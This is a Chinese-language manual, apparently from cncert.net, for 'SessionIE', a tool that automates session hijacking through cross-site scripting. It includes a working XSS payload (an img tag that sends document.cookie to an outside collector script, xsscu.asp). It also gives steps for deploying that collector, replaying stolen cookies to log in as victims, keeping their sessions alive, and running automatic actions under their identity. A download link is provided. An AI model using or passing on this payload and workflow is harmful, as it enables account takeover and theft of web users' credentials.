SessionIE--通用XSS辅助工具

作者: cnqing
来源: cncert.net
 

一、 什么是 SessionIE
Sessionie是由CCTEAM开发团队开发的通用XSS辅助工具，可利用获取的COOKIE复制相同的http会话本地以实现直接登录，及执行相应身份动作。

 

二、功能特点
² Sessionie可以快速的利用XSS，而无需构造伪页面或代码等繁琐却不能重用的劳力

² Sessionie能即时的跟踪目标来源并进行 Session维持而保持Session的有效性

² Sessionie能以多种方式通报信息，执行动作

² 两种COOKIE修改方式，允许将Cookie设置到外部的任意浏览器

² 完善的导入导出功能

² 自动保存成功session的对应html文档

² 绿色免装

三、程序界面与使用方法
1.部署COOKIE服务器
将附带的xsscu.asp上传至支持ASP的服务器，需要当前目录的FSO权限，修改其中的密码为自己的管理密码。之后sessionie 设置要用到这个地址和密码。

构造如下的XSS代码获取COOKIE

“<img src=http://www.cncert.net/xss/xsscu.asp?+escape(document.cookie)>” 注意要加escape函数。

2.设置 sessionie
Sessionie为单一可执行程序，主界面如图：

设置窗口

设置窗口说明：

u 维持间隔：获取cookie后维持session的间隔时间。

u 使用PCAP:

不勾选则使用API模式,

勾选则使用pcap模式，需要设置网卡,该模式可将session设置到外部浏览器

建议使用api模式，当api设置COOKIE失败时可选用pcap模式

u URL重复：

限制出现相同来源URL+COOKIE的次数，防止无限重复添加。

u 保存页面：

每次维持 session将保存响应的http内容

u 网址查找 替换

在来源url中查找字符并替换为设定字符

空值 不替换

* 为整个url替换

u COOKIE服务器 用于接收COOKIE信息的服务脚本 程序自带的为xsscu.asp.

 

u 预定义动作：

域：要执行动作的完整域名 如果来源(入口)网址是http://bbs.cncert.net/bbs/index.asp 那么 要设置为 bbs.cncert.net

成功关键字：用来匹配是否成功的关键字，最好是英文。当返回的html 内容中出现该字符则判为成功，进而执行动作。

成功后动作 url ：动作网址

类型：POST/GET

数据：当POST类型是，为表单内容。

每个域可执行多个动作，顺序为列表中显示顺序。

u 全局消息提示：

用于邮件/SMS的接口，会向设置的地址 发送HTTPPOST数据。

u 运行文件：每次获取到COOKIE时（不判断是否成功），将会打开选中的文件，比如一个MP3。

 

设置完成后保存.回到主界面，点击顶部菜单开始后，程序开始检监控服务器COOKIE文件。底部状态栏同步显示工作状态和检视服务器COOKIE的次数。

之后您可以在domainlist的右键菜单控制某笔记录的维持、停止、删除以及导入和导出动作。

四、注意事项
u xsscu.asp会记录sessionie的来源IP地址和被XSS的客户来源地址。当2者为同一IP时候，xsscu 不会记录COOKIE。所以测试或使用过程不可以使用同一个IP。

u 软件下载后 需要安装.net 2.0，并且解压出来后运行。

u 3．不要有多个sessionie使用一个cookie服务脚本，否则导致不能正常接收cookie.

五、FAQ
1.为什么总是接受不到COOKIE?

答：首先检查服务器是否生成了以日期格式为文件名的 xml文件，其次是否使用了正确的密码，再次检查下啊主界面右下角的拾取cookie次数是否有变化。如果没有xml文件生成那么请检查您的XSS代码和脚本目录FSO权限。

2.问什么获取到COOKIE还是不能登录？

答：有可能获取的COOKIE已经被注销，sessionie能维持session不随时间流逝而销毁，但是不能维持其它人为的注销方式。还有可能是服务器绑定了IP和session。

3.PCAP方式和API方式有什么区别？

答：pcap方式可以将cookie设置到外部浏览器，作用和API模式相同。首选API模式，当API模式无法登陆时，可选PCAP模式。

4.能否开源？

答：由于程序使用了商业控件，不便开源，即使开源，也无法利用设计器进行2次开发。

六、最后
Bug to cncert.net@gmail.com

 

 

操作手册地址
http://www.cncert.net/sessionie/document.html

新功能在在 空虚浪子心 的《Session Fixation 攻防实战》演示动画 地址
http://www.cncert.net/up_files/soft/sessionie.html

下载地址：http://www.cncert.net/up_files/soft/sessionie3.10.rar